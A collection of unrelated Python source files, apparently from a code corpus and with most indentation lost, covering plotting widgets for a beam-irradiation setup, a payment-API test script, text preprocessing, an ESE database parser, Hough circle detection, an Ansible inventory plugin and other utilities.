_ = pg.InfLineLabel(line=v_line, text='Down', position=0.05, movable=False)
self.legend = pg.LegendItem(offset=(80, -50))
self.legend.setParentItem(self.plt)
if any(x in self.ro_types for x in ('sem_h_shift', 'sem_v_shift')):
sig = 'analog'
self.curves[sig] = CrosshairItem(color=_MPL_COLORS[0], name=sig,
horizontal='sem_h_shift' in self.ro_types,
vertical='sem_v_shift' in self.ro_types)
# Add 2D histogram
if self._add_hist and self.curves[sig].horizontal and self.curves[sig].vertical:
self.add_2d_hist(curve=sig, autoDownsample=True, opacity=0.66, cmap='hot')
if any(all(x in self.ro_types for x in y) for y in [('sem_left', 'sem_right'), ('sem_up', 'sem_down')]):
sig = 'digital'
self.curves[sig] = CrosshairItem(color=_MPL_COLORS[1], name=sig,
horizontal='sem_left' in self.ro_types and 'sem_right' in self.ro_types,
vertical='sem_up' in self.ro_types and 'sem_down' in self.ro_types)
# Add 2D histogram
if self._add_hist and self.curves[sig].horizontal and self.curves[sig].vertical:
self.add_2d_hist(curve=sig, autoDownsample=True, opacity=0.66, cmap='hot')
# Show data and legend
if self.curves:
for curve in self.curves:
if isinstance(self.curves[curve], CrosshairItem):
self.curves[curve].set_legend(self.legend)
self.curves[curve].set_plotitem(self.plt)
self.show_data(curve)
def add_2d_hist(self, curve, cmap='hot', bins=(50, 50), **kwargs):
if curve not in self.curves:
logging.error("Can only add histogram to existing curve")
return
if len(bins) != 2:
raise ValueError("Bins must be iterable of integers of len 2")
hist_name = curve + '_hist'
if 'lut' not in kwargs:
# Create colormap and init
colormap = mcmaps.get_cmap(cmap)
colormap._init()
# Convert matplotlib colormap from 0-1 to 0 -255 for Qt
lut = (colormap._lut * 255).view(np.ndarray)
# Update kw
kwargs['lut'] = lut
get_scale = lambda plt_range, n_bins: float(abs(plt_range[0] - plt_range[1])) / n_bins
# Add and manage position
self.curves[hist_name] = pg.ImageItem(**kwargs)
self.curves[hist_name].translate(self._plt_range[0], self._plt_range[2])
self.curves[hist_name].scale(get_scale(self._plt_range[:2], bins[0]), get_scale(self._plt_range[2:], bins[1]))
self.curves[hist_name].setZValue(-10)
# Add hist data
self._data[hist_name] = {}
self._data[hist_name]['hist'] = np.zeros(shape=bins)
self._data[hist_name]['edges'] = (np.linspace(self._plt_range[0], self._plt_range[1], bins[0] + 1),
np.linspace(self._plt_range[2], self._plt_range[3], bins[1] + 1))
self._data[hist_name]['centers'] = (0.5 * (self._data[hist_name]['edges'][0][1:] + self._data[hist_name]['edges'][0][:-1]),
0.5 * (self._data[hist_name]['edges'][1][1:] + self._data[hist_name]['edges'][1][:-1]))
def set_data(self, data):
# Meta data and data
meta, pos_data = data['meta'], data['data']['position']
for sig in pos_data:
if sig not in self.curves:
continue
h_shift = None if 'h' not in pos_data[sig] else pos_data[sig]['h']
v_shift = None if 'v' not in pos_data[sig] else pos_data[sig]['v']
# Update data
self._data[sig] = (h_shift, v_shift)
if sig + '_hist' in self.curves and all(x is not None for x in self._data[sig]):
# Get histogram indices and increment
idx_x, idx_y = (np.searchsorted(self._data[sig + '_hist']['edges'][i], self._data[sig][i]) for i in range(len(self._data[sig])))
try:
self._data[sig + '_hist']['hist'][idx_x, idx_y] += 1
except IndexError:
logging.debug("Histogram indices ({},{}) out of bounds for shape ({},{})".format(idx_x, idx_y, *self._data[sig + '_hist']['hist'].shape))
self._data_is_set = True
def _set_stats(self):
"""Show curve statistics for active_curves which have been clicked or are hovered over"""
current_actives = [curve for curve in self.active_curves if self.active_curves[curve]]
if not current_actives:
return
n_actives = len(current_actives)
# Update text for statistics widget
current_stat_text = 'Curve stats of {} curve{}:\n'.format(n_actives, '' if n_actives == 1 else 's')
# Loop over active curves and create current stats
for curve in current_actives:
current_stat_text += ' '
# Histogram stats
if 'hist' in curve:
v = np.sum(self._data[curve]['hist'], axis=0)
h = np.sum(self._data[curve]['hist'], axis=1)
try: # Weights are fine
mean_h = np.average(self._data[curve]['centers'][0], weights=h)
std_h = np.sqrt(np.average((self._data[curve]['centers'][0] - mean_h)**2, weights=h))
mean_v = np.average(self._data[curve]['centers'][0], weights=v)
std_v = np.sqrt(np.average((self._data[curve]['centers'][1] - mean_v) ** 2, weights=v))
except ZeroDivisionError: # Weights sum up to 0; no histogram entries
mean_h = std_h = mean_v = std_v = np.nan
current_stat_text += curve + ':\n '
current_stat_text += u'Horizontal: ({:.2f} \u00B1 {:.2f}) {}'.format(mean_h, std_h, self.plt.getAxis('bottom').labelUnits) + '\n '
current_stat_text += u'Vertical: ({:.2f} \u00B1 {:.2f}) {}'.format(mean_v, std_v, self.plt.getAxis('left').labelUnits)
else:
current_stat_text += curve + ':\n ' + u'Position: ({:.2f}, {:.2f}) {}'.format(self._data[curve][0],
self._data[curve][1],
self.plt.getAxis('bottom').labelUnits)
current_stat_text += '\n' if curve != current_actives[-1] else ''
# Set color and text
current_stat_color = (100, 100, 100)
self.stats_text.fill = pg.mkBrush(color=current_stat_color, style=pg.QtCore.Qt.SolidPattern)
self.stats_text.setText(current_stat_text)
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
if self._data_is_set:
for sig in self.curves:
if sig not in self._data:
continue
if isinstance(self.curves[sig], CrosshairItem):
self.curves[sig].set_position(*self._data[sig])
else:
self.curves[sig].setImage(self._data[sig]['hist'])
if self._show_stats:
self._set_stats()
class FluenceHist(IrradPlotWidget):
"""
Plot for displaying the beam position. The position is displayed from analog and digital data if available.
"""
def __init__(self, irrad_setup, refresh_rate=5, daq_device=None, parent=None):
super(FluenceHist, self).__init__(refresh_rate=refresh_rate, parent=parent)
# Init class attributes
self.irrad_setup = irrad_setup
self.daq_device = daq_device
self._data['hist_rows'] = np.arange(self.irrad_setup['n_rows'] + 1)
# Setup the main plot
self._setup_plot()
def _setup_plot(self):
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setTitle(type(self).__name__ if self.daq_device is None else type(self).__name__ + ' ' + self.daq_device)
self.plt.setLabel('left', text='Proton fluence', units='cm^-2')
self.plt.setLabel('right', text='Neutron fluence', units='cm^-2')
self.plt.setLabel('bottom', text='Scan row')
self.plt.getAxis('right').setScale(self.irrad_setup['kappa'])
self.plt.getAxis('left').enableAutoSIPrefix(False)
self.plt.getAxis('right').enableAutoSIPrefix(False)
self.plt.setLimits(xMin=0, xMax=self.irrad_setup['n_rows'], yMin=0)
self.legend = pg.LegendItem(offset=(80, 80))
self.legend.setParentItem(self.plt)
# Histogram of fluence per row
self.curves['hist'] = pg.PlotCurveItem()
self.curves['hist'].setFillLevel(0.33)
self.curves['hist'].setBrush(pg.mkBrush(color=_MPL_COLORS[0]))
# Points at respective row positions
self.curves['points'] = pg.ScatterPlotItem()
self.curves['points'].setPen(color=_MPL_COLORS[2], style=pg.QtCore.Qt.SolidLine)
self.curves['points'].setBrush(color=_MPL_COLORS[2])
self.curves['points'].setSymbol('o')
self.curves['points'].setSize(10)
# Errorbars for points; needs to initialized with x, y args, otherwise cnnot be added to PlotItem
self.curves['errors'] = pg.ErrorBarItem(x=np.arange(1), y=np.arange(1), beam=0.25)
# Horizontal line indication the mean fluence over all rows
self.curves['mean'] = pg.InfiniteLine(angle=0)
self.curves['mean'].setPen(color=_MPL_COLORS[1], width=2)
self.p_label = pg.InfLineLabel(self.curves['mean'], position=0.2)
self.n_label = pg.InfLineLabel(self.curves['mean'], position=0.8)
# Show data and legend
for curve in self.curves:
self.show_data(curve)
def set_data(self, data):
# Meta data and data
_meta, _data = data['meta'], data['data']
# Set data
self._data['hist'] = data['data']['hist']
self._data['hist_err'] = data['data']['hist_err']
# Get stats
self._data['hist_mean'], self._data['hist_std'] = (f(self._data['hist']) for f in (np.mean, np.std))
self._data_is_set = True
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
if self._data_is_set:
for curve in self.curves:
if curve == 'hist':
try:
self.curves[curve].setData(x=self._data['hist_rows'], y=self._data['hist'], stepMode=True)
self.curves['mean'].setValue(self._data['hist_mean'])
self.p_label.setFormat('Mean: ({:.2E} +- {:.2E}) protons / cm^2'.format(self._data['hist_mean'], self._data['hist_std']))
self.n_label.setFormat('Mean: ({:.2E} +- {:.2E}) neq / cm^2'.format(*[x * self.irrad_setup['kappa'] for x in (self._data['hist_mean'],
self._data['hist_std'])]))
except Exception as e:
logging.warning('Fluence histogram exception: {}'.format(e.message))
elif curve == 'points':
self.curves[curve].setData(x=self._data['hist_rows'][:-1] + 0.5, y=self._data['hist'])
elif curve == 'errors':
self.curves[curve].setData(x=self._data['hist_rows'][:-1] + 0.5, y=self._data['hist'], height=np.array(self._data['hist_err']), pen=_MPL_COLORS[2])
class FractionHist(IrradPlotWidget):
"""This implements a histogram of the fraction of one signal to another"""
def __init__(self, rel_sig, norm_sig, bins=100, colors=_MPL_COLORS, refresh_rate=10, parent=None):
super(FractionHist, self).__init__(refresh_rate=refresh_rate, parent=parent)
# Signal names; relative signal versus the signal it's normalized to
self.rel_sig = rel_sig
self.norm_sig = norm_sig
# Get colors
self.colors = colors
# Hold data
self._data['hist'], self._data['edges'] = np.zeros(shape=bins), np.linspace(0, 100, bins + 1)
self._data['centers'] = 0.5 * (self._data['edges'][1:] + self._data['edges'][:-1])
self._setup_plot()
def _setup_plot(self):
# Get plot item and setup
self.plt.setDownsampling(auto=True)
self.plt.setTitle(type(self).__name__ + ' ' + self.rel_sig)
self.plt.setLabel('left', text='#')
self.plt.setLabel('bottom', text='Fraction {} / {}'.format(self.rel_sig, self.norm_sig), units='%')
self.plt.getAxis('left').enableAutoSIPrefix(False)
self.plt.showGrid(x=True, y=True)
self.plt.setLimits(xMin=0, xMax=self._data['edges'].shape[0], yMin=0)
self.legend = pg.LegendItem(offset=(80, 80))
self.legend.setParentItem(self.plt)
self.enable_stats()
# Histogram of fraction
self.curves['hist'] = pg.PlotCurveItem(name='{} / {} histogram'.format(self.rel_sig, self.norm_sig))
self.curves['hist'].setFillLevel(0.33)
self.curves['hist'].setBrush(pg.mkBrush(color=self.colors[0]))
# Init items needed
self.curves['current_frac'] = CrosshairItem(color=self.colors[1], name='Current bin')
self.curves['current_frac'].v_shift_line.setValue(5) # Make crosshair point visible above 0
self.curves['current_frac'].v_shift_line.setVisible(False) # We need x and y for the dot in the middle but we don't want horizontal line to be visible
self.curves['current_frac'].set_legend(self.legend)
self.curves['current_frac'].set_plotitem(self.plt)
# Show data and legend
for curve in self.curves:
self.show_data(curve)
def set_data(self, data):
# Meta data and data
_meta, _data = data['meta'], data['data']
# Store currrent fraction
self._data['fraction'] = _data
# Histogram fraction
hist_idx = np.searchsorted(self._data['edges'], _data)
try:
self._data['hist'][hist_idx] += 1
self._data['hist_idx'] = hist_idx
self._data_is_set = True
except IndexError:
logging.debug("Histogram index {} out of bounds for shape {}".format(hist_idx, *self._data['hist'].shape))
def _set_stats(self):
"""Show curve statistics for active_curves which have been clicked or are hovered over"""
current_actives = [curve for curve in self.active_curves if self.active_curves[curve]]
if not current_actives:
return
n_actives = len(current_actives)
# Update text for statistics widget
current_stat_text = 'Curve stats of {} curve{}:\n'.format(n_actives, '' if n_actives == 1 else 's')
# Loop over active curves and create current stats
for curve in current_actives:
current_stat_text += ' '
# Histogram stats
if 'hist' in curve:
try:
mean = np.average(self._data['centers'], weights=self._data['hist'])
std = np.sqrt(np.average((self._data['centers'] - mean)**2, weights=self._data['hist']))
except ZeroDivisionError: # Weights sum up to 0; no histogram entries
mean = std = np.nan
current_stat_text += curve + u': ({:.2f} \u00B1 {:.2f}) {}'.format(mean, std, self.plt.getAxis('bottom').labelUnits)
else:
current_stat_text += curve + u': {:.2f} {}'.format(self._data['fraction'], self.plt.getAxis('bottom').labelUnits)
current_stat_text += '\n' if curve != current_actives[-1] else ''
# Set color and text
current_stat_color = (100, 100, 100)
self.stats_text.fill = pg.mkBrush(color=current_stat_color, style=pg.QtCore.Qt.SolidPattern)
self.stats_text.setText(current_stat_text)
def refresh_plot(self):
"""Refresh the plot. This method is supposed to be connected to the timeout-Signal of a QTimer"""
# test if 'set_data' has been called
if self._data_is_set:
for curve in self.curves:
if curve == 'hist':
self.curves[curve].setData(x=self._data['edges'], y=self._data['hist'], stepMode=True)
if curve == 'current_frac':
self.curves[curve].set_position(x=self._data['hist_idx'] + 0.5, y=self._data['hist'][self._data['hist_idx']])
if self._show_stats:
self._set_stats()
|
StarcoderdataPython
|
8120549
|
import os, hashlib, warnings, requests, json
import base64
from Crypto.Cipher import DES3
class PayTest(object):
"""this is the getKey function that generates an encryption Key for you by passing your Secret Key as a parameter."""
def __init__(self):
pass
def getKey(self,secret_key):
hashedseckey = hashlib.md5(secret_key.encode("utf-8")).hexdigest()
hashedseckeylast12 = hashedseckey[-12:]
seckeyadjusted = secret_key.replace('FLWSECK-', '')
seckeyadjustedfirst12 = seckeyadjusted[:12]
return seckeyadjustedfirst12 + hashedseckeylast12
"""This is the encryption function that encrypts your payload by passing the text and your encryption Key."""
def encryptData(self, key, plainText):
blockSize = 8
padDiff = blockSize - (len(plainText) % blockSize)
cipher = DES3.new(key, DES3.MODE_ECB)
plainText = "{}{}".format(plainText, "".join(chr(padDiff) * padDiff))
# cipher.encrypt - the C function that powers this doesn't accept plain string, rather it accepts byte strings, hence the need for the conversion below
test = plainText.encode('utf-8')
encrypted = base64.b64encode(cipher.encrypt(test)).decode("utf-8")
return encrypted
def pay_via_card(self):
data = {
'PBFPubKey': '<KEY>',
"cardno": "4775750000424189",
"cvv": "953",
"expirymonth": "10",
"expiryyear": "20",
"currency": "NGN",
"country": "NG",
"amount": "12",
"email": "<EMAIL>",
"phonenumber": "256783474784",
"firstname": "Michael",
"lastname": "Katagaya",
"IP": "355426087298442",
"txRef": "test01",
"device_fingerprint": "<KEY>"
}
sec_key = '<KEY>'
# hash the secret key with the get hashed key function
hashed_sec_key = self.getKey(sec_key)
# encrypt the hashed secret key and payment parameters with the encrypt function
encrypt_3DES_key = self.encryptData(hashed_sec_key, json.dumps(data))
# payment payload
payload = {
"PBFPubKey": "<KEY>",
"client": encrypt_3DES_key,
"alg": "3DES-24"
}
# card charge endpoint
endpoint = "https://api.ravepay.co/flwv3-pug/getpaidx/api/charge"
# set the content type to application/json
headers = {
'content-type': 'application/json',
}
response = requests.post(endpoint, headers=headers, data=json.dumps(payload))
print(response.json())
rave = PayTest()
rave.pay_via_card()
|
StarcoderdataPython
|
3248535
|
import numpy as np
import pickle
lexicon = []
with open('ptb.txt','r') as f:
contents = f.readlines()
for l in contents[:len(contents)]:
all_words=l.split()
lexicon += list(all_words)
lexicon = list(set(lexicon));
print(lexicon)
vocb_size=len(lexicon)+1
print('vocb_size', vocb_size)
pad=vocb_size
voc = lexicon
vocab=dict([(x, y) for (y, x) in enumerate(voc)])
rev_vocab=dict([(x, y) for (x, y) in enumerate(voc)])
# Input data_file
with open('ptb.txt','r') as f:
contents = f.readlines()
x=[]
for sentence in contents:
a=sentence;
d=sorted(a);
token=[vocab.get(w) for w in d]
n_token=[]
for i in token:
if(i!= None):
n_token.append(i)
x.append(n_token)
max_len=0
ipf=[]
for i in x:
if max_len<=len(i):
max_len=len(i)
else: max_len=max_len
for i in x:
j=[]
j=np.lib.pad(i, (0,max_len-len(i)), 'constant', constant_values=(pad))
ipf.append(j)
data_x = np.array(ipf).T
# Train_X
testing_size=int(data_x.shape[1]-1)
train_x= data_x[:,:testing_size]
print('train_x.shape', train_x.shape)
#Getting Seq_len
seq_length=len(train_x)
print('seq_length', seq_length)
n_sents=train_x.shape[1]
print('n_sents', n_sents)
#Test_X
test_x=data_x[:,testing_size:]
print('test_x.shape', test_x.shape)
t=test_x.flatten()
tok=[rev_vocab.get(i) for i in t]
n_token=[]
for i in tok:
if(i!= None):
n_token.append(i)
c = ''.join(n_token);
print('Test_i/p',c)
# Output data_file
with open('ptb.txt','r') as f:
contents = f.readlines()
y=[]
for l in contents[:len(contents)]:
token=[vocab.get(w) for w in l]
n_token=[]
for i in token:
if(i!=None):
n_token.append(i)
y.append(n_token)
max_len=0
opf=[]
w=[]
for i in y:
if max_len<=len(i):
max_len=len(i)
else: max_len=max_len
for i in y:
j=[]
j=np.lib.pad(i, (0,max_len-len(i)), 'constant', constant_values=(pad))
p=np.ones_like(j,dtype=np.float32)
for i in xrange(len(j)):
if j[i]==pad:
index_v=i
p[index_v]=0
w.append(p)
opf.append(j)
data_y = np.array(opf).T
#train_y
testing_size=int(data_y.shape[1]-1)
train_y=data_y[:,:testing_size]
print('train_y.shape', train_y.shape)
#test_y
test_y=data_y[:,testing_size:]
print('test_y.shape', test_y.shape)
t=test_y.flatten()
tok=[rev_vocab.get(i) for i in t]
n_token=[]
for i in tok:
if(i!= None):
n_token.append(i)
c = ''.join(n_token);
print('Test_o/p',c)
#data_weights
testing_size=int(data_y.shape[1]-1)
data_weight=np.array(w).T
weight=data_weight[:,:testing_size]
print('weight.shape', weight.shape)
with open('data_set.pickle','wb') as f:
pickle.dump([train_x,train_y,test_x,test_y,weight,seq_length,n_sents,vocb_size,rev_vocab],f)
|
StarcoderdataPython
|
12816082
|
<gh_stars>0
def linear_search(arr, n, x):
for i in range(n):
if arr[i] == x:
return True
return False
arr = [23,512,214,12,5,67,1,4,65]
result = linear_search(arr, len(arr), 214)
print('Search Element is found', result)
|
StarcoderdataPython
|
5147365
|
# -*- coding: utf-8 -*-
""" systemcheck - A Python-based extensive configuration validation solution
systemcheck is a simple application that has two primary functions:
* Compare the configuration of a specific system parameters against a list of desired values
* Document the configuration of a specific system.
"""
# define authorship information
__authors__ = ['<NAME>']
__author__ = ','.join(__authors__)
__credits__ = []
__copyright__ = 'Copyright (c) 2017'
__license__ = 'GNU AGPLv3'
# maintanence information
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
# define version information
__requires__ = ['PyQt5']
__version_info__ = (0, 1, 0)
__version__ = 'v{}.{}.{}'.format(*__version_info__)
__revision__ = __version__
#from systemcheck import plugins
#from systemcheck import config
#from systemcheck import models
#from systemcheck import session
#from systemcheck import systems
#from systemcheck import checks
#from systemcheck import gui
import systemcheck.checks
import systemcheck.plugins
import systemcheck.config
import systemcheck.models
import systemcheck.session
import systemcheck.systems
import systemcheck.gui
|
StarcoderdataPython
|
5002959
|
from monitor import *
runner = monitor()
print 'valid classifier', runner.valid_S2L()
print 'valid CLM:', runner.valid_L2S()
|
StarcoderdataPython
|
278867
|
# -*- coding: utf-8 -*-
"""Parser for Extensible Storage Engine (ESE) database files (EDB)."""
import pyesedb
from plaso.lib import specification
from plaso.parsers import interface
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import plugins
class ESEDatabase(object):
"""Extensible Storage Engine (ESE) database."""
def __init__(self):
"""Initializes a Extensible Storage Engine (ESE) database."""
super(ESEDatabase, self).__init__()
self._esedb_file = None
self._table_names = []
@property
def tables(self):
"""list[str]: names of all the tables."""
if not self._table_names:
for esedb_table in self._esedb_file.tables:
self._table_names.append(esedb_table.name)
return self._table_names
def Close(self):
"""Closes the database."""
self._esedb_file.close()
self._esedb_file = None
def GetTableByName(self, name):
"""Retrieves a table by its name.
Args:
name (str): name of the table.
Returns:
pyesedb.table: the table with the corresponding name or None if there is
no table with the name.
"""
return self._esedb_file.get_table_by_name(name)
def Open(self, file_object):
"""Opens an Extensible Storage Engine (ESE) database file.
Args:
file_object (dfvfs.FileIO): file-like object.
Raises:
IOError: if the file-like object cannot be read.
OSError: if the file-like object cannot be read.
ValueError: if the file-like object is missing.
"""
if not file_object:
raise ValueError('Missing file object.')
self._esedb_file = pyesedb.file()
self._esedb_file.open_file_object(file_object)
class ESEDBCache(plugins.BasePluginCache):
"""A cache storing query results for ESEDB plugins."""
def StoreDictInCache(self, attribute_name, dict_object):
"""Store a dict object in cache.
Args:
attribute_name (str): name of the attribute.
dict_object (dict): dictionary.
"""
setattr(self, attribute_name, dict_object)
class ESEDBParser(interface.FileObjectParser):
"""Parses Extensible Storage Engine (ESE) database files (EDB)."""
_INITIAL_FILE_OFFSET = None
NAME = 'esedb'
DATA_FORMAT = 'Extensible Storage Engine (ESE) Database File (EDB) format'
_plugin_classes = {}
@classmethod
def GetFormatSpecification(cls):
"""Retrieves the format specification.
Returns:
FormatSpecification: format specification.
"""
format_specification = specification.FormatSpecification(cls.NAME)
format_specification.AddNewSignature(b'\xef\xcd\xab\x89', offset=4)
return format_specification
def ParseFileObject(self, parser_mediator, file_object):
"""Parses an ESE database file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): file-like object.
"""
database = ESEDatabase()
try:
database.Open(file_object)
except (IOError, ValueError) as exception:
parser_mediator.ProduceExtractionWarning(
'unable to open file with error: {0!s}'.format(exception))
return
# Compare the list of available plugin objects.
cache = ESEDBCache()
try:
for plugin in self._plugins:
if parser_mediator.abort:
break
file_entry = parser_mediator.GetFileEntry()
display_name = parser_mediator.GetDisplayName(file_entry)
if not plugin.CheckRequiredTables(database):
logger.debug('Skipped parsing file: {0:s} with plugin: {1:s}'.format(
display_name, plugin.NAME))
continue
logger.debug('Parsing file: {0:s} with plugin: {1:s}'.format(
display_name, plugin.NAME))
try:
plugin.UpdateChainAndProcess(
parser_mediator, cache=cache, database=database)
except Exception as exception: # pylint: disable=broad-except
parser_mediator.ProduceExtractionWarning((
'plugin: {0:s} unable to parse ESE database with error: '
'{1!s}').format(plugin.NAME, exception))
finally:
# TODO: explicitly clean up cache.
database.Close()
manager.ParsersManager.RegisterParser(ESEDBParser)
|
StarcoderdataPython
|
1732819
|
import os
import glob
from PIL import Image
import numpy as np
import random
image_dir = "[DIRECTORY OF SCRAPED IMAGES]"
out_dir = "./out_pruned_images"
os.makedirs(out_dir, exist_ok=True)
filelist = glob.glob(os.path.join(image_dir, "*.png"))
random.shuffle(filelist)
uninteresting_count = 0
uninteresting_sat_stdevs = []
for i, image_path in enumerate(filelist):
pil_img = Image.open(image_path)
img = np.array(pil_img)
H, W, C = img.shape
sat_img = img[:, :W // 2, :]
map_img = img[:, W // 2:, :]
map_img_stdev = np.std(map_img.reshape((H * W // 2, C)), axis=0).mean()
if map_img_stdev < 1.0:
uninteresting_count += 1
sat_img_stdev = np.std(sat_img.reshape((H * W // 2, C)), axis=0).mean()
uninteresting_sat_stdevs.append(sat_img_stdev)
if sat_img_stdev < 30.0:
out_path = os.path.join(out_dir, os.path.basename(image_path))
pil_img.save(out_path)
print(out_path, i / len(filelist) * 100.0)
|
StarcoderdataPython
|
6571021
|
"""Resolve import locations and type hints."""
from functools import lru_cache
from importlib import import_module
from typing import Optional, Tuple, Any, Union
from ..parse import Name, NameBreak
def resolve_location(chain: Name) -> Optional[str]:
"""Find the final type that a name refers to."""
comps = []
for comp in chain.import_components:
if comp == NameBreak.call:
new = locate_type(tuple(comps))
if new is None:
return
comps = new.split('.')
else:
comps.append(comp)
return '.'.join(comps)
@lru_cache(maxsize=None)
def locate_type(components: Tuple[str]) -> Optional[str]:
"""Find type hint and resolve to new location."""
value, index = closest_module(components)
if index is None or index == len(components):
return
remaining = components[index:]
real_location = '.'.join(components[:index])
for i, component in enumerate(remaining):
value = getattr(value, component, None)
real_location += '.' + component
if value is None:
return
if isinstance(value, type):
# We don't differentiate between classmethods and ordinary methods,
# as we can't guarantee correct runtime behavior anyway.
real_location = fully_qualified_name(value)
# A possible function / method call needs to be last in the chain.
# Otherwise we might follow return types on function attribute access.
elif callable(value) and i == len(remaining) - 1:
annotations = getattr(value, '__annotations__', {})
ret_annotation = annotations.get('return', None)
# Inner type from typing.Optional (Union[T, None])
origin = getattr(ret_annotation, '__origin__', None)
args = getattr(ret_annotation, '__args__', None)
if origin is Union and len(args) == 2 and isinstance(None, args[1]):
ret_annotation = args[0]
if not ret_annotation or hasattr(ret_annotation, '__origin__'):
return
real_location = fully_qualified_name(ret_annotation)
return real_location
def fully_qualified_name(type_: type) -> str:
"""Construct the fully qualified name of a type."""
return getattr(type_, '__module__', '') + '.' + getattr(type_, '__qualname__', '')
@lru_cache(maxsize=None)
def closest_module(components: Tuple[str]) -> Tuple[Any, Optional[int]]:
"""Find closest importable module."""
mod = None
for i in range(1, len(components) + 1):
try:
mod = import_module('.'.join(components[:i]))
except ImportError:
break
else:
return None, None
return mod, i - 1
|
StarcoderdataPython
|
11238972
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 23 16:36:03 2019
@author: yanik
"""
import cv2
from math import sqrt, pi, cos, sin
import numpy as np
image = cv2.imread("./Material/marker.png")
row, col, ch = image.shape
#Apply Gaussian Blur
blur = cv2.GaussianBlur(image,(5,5),0)
#Convert image to grayscale
blurgray = cv2.cvtColor(blur, cv2.COLOR_BGR2GRAY)
'''
#This part is written by using cv2's Hough method
d_length = int(((row**2 + col **2)**(1/2))/4)
#Apply Hough method
circles = cv2.HoughCircles(blurgray, cv2.HOUGH_GRADIENT, 1, 20, param1=50, param2=50,
minRadius=1, maxRadius=d_length)
#Displays circles
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
center = (i[0], i[1])
# circle center
cv2.circle(image, center, 2, (0, 0, 255), 3)
# circle outline
radius = i[2]
cv2.circle(image, center, radius, (0, 255, 0), 3)
cv2.imshow("detected circles", image)
cv2.waitKey(0)
'''
#Find thresholds
max_treshold,image1 = cv2.threshold(blurgray,0,255,cv2.THRESH_BINARY + cv2.THRESH_OTSU)
low_treshold = max_treshold/3
#Apply canny operator
image2 = cv2.Canny(image1,low_treshold,max_treshold)
'''
cv2.imshow("canny", image2)
cv2.waitKey(0)
'''
#Create accumulator
A = np.zeros((row+10,col+10,30), dtype = np.float32)
for x in range(row):
for y in range(col):
if(image2[x,y] > 0):
for r in range(20, 30):
for t in range(360):
a = int(x-r * cos(t * (pi/180)))
b = int(y-r * sin(t * (pi/180)))
A[a][b][r] += 1
image3 = cv2.imread("./Material/marker.png")
for a in range(col):
for b in range(row):
for r in range(20, 30):
if (A[b][a][r] > 150):
cv2.circle(image3, (a,b), 2, (0, 0, 255), 3)
cv2.circle(image3, (a,b), r, (0, 255, 0), 3)
cv2.imshow("out", image3)
cv2.imwrite("part2.jpg", image3)
cv2.waitKey(0)
|
StarcoderdataPython
|
3561365
|
<reponame>nightlyds/library-basic-authentication-server<filename>order/serializers.py<gh_stars>0
from rest_framework import serializers
from .models import Order
class OrderSerializer(serializers.ModelSerializer):
class Meta:
model = Order
fields = ('id', 'user', 'book', 'created_at', 'end_at', 'plated_end_at')
|
StarcoderdataPython
|
5037081
|
<filename>puzzle.ixtutorial/plugins/inventory/tutorial_inventory.py
# copyright, author, ...
DOCUMENTATION = '''
name: tutorial_inventory
plugin_type: inventory
short_description: generate random hostname
description:
- A (useles) example inventory for our tutorial.
- Creates inventory with random hostnames.
- Creates group C(randomhosts).
- Defines variables C(foo) an C(bar)
options:
plugin:
description: Name of this plugin
required: True
num_hosts:
description: number of random hosts
required: True
name_len:
description: length of hostname (number of characters)
type: int
required: True
hostname_chars:
description: character used in random hostnames
required: True
type: string or list
'''
EXAMPLES = '''
plugin: puzzle.ixtutorial.tutorial_inventory
num_hosts: 10
name_len: 5
hostname_chars: abcdefghijkxyz
'''
from ansible.plugins.inventory import BaseInventoryPlugin
import random
import os
class InventoryModule(BaseInventoryPlugin):
NAME = 'tutorial_inventory'
def __init__(self):
super(InventoryModule, self).__init__()
def verify_file(self, path):
''' verify the inventory file '''
return os.path.exists(path)
def parse(self, inventory, loader, path, cache=False):
''' parse the inventory file '''
super(InventoryModule, self).parse(inventory,
loader,
path,
cache=cache)
config = self._read_config_data(path)
grp_all = inventory.groups['all']
grp_all.set_variable('foo', 'testval1')
inventory.add_group('randomhosts')
grp_randomhosts = inventory.groups['randomhosts']
grp_randomhosts.set_variable('bar', 'testval2')
for _ in range(config['num_hosts']):
rand_host = ''.join(
random.choice(config['hostname_chars'])
for _ in range(config['name_len']))
inventory.add_host(rand_host)
inventory.add_child('randomhosts', rand_host)
|
StarcoderdataPython
|
152669
|
<gh_stars>0
class AuthFailed(Exception):
pass
class SearchFailed(Exception):
pass
|
StarcoderdataPython
|
3512310
|
<reponame>Kortemme-Lab/covariation<filename>analysis/utils/pdb.py<gh_stars>1-10
#!/usr/bin/env python2
# encoding: utf-8
# The MIT License (MIT)
#
# Copyright (c) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import re
import sys
import os
import types
import string
import types
from basics import Residue, PDBResidue, Sequence, SequenceMap, residue_type_3to1_map, protonated_residue_type_3to1_map, non_canonical_amino_acids, protonated_residues_types_3, residue_types_3, Mutation, ChainMutation, SimpleMutation
from basics import dna_nucleotides, rna_nucleotides, dna_nucleotides_3to1_map, dna_nucleotides_2to1_map, non_canonical_dna, non_canonical_rna, all_recognized_dna, all_recognized_rna
from fsio import read_file, write_file
### Residue types
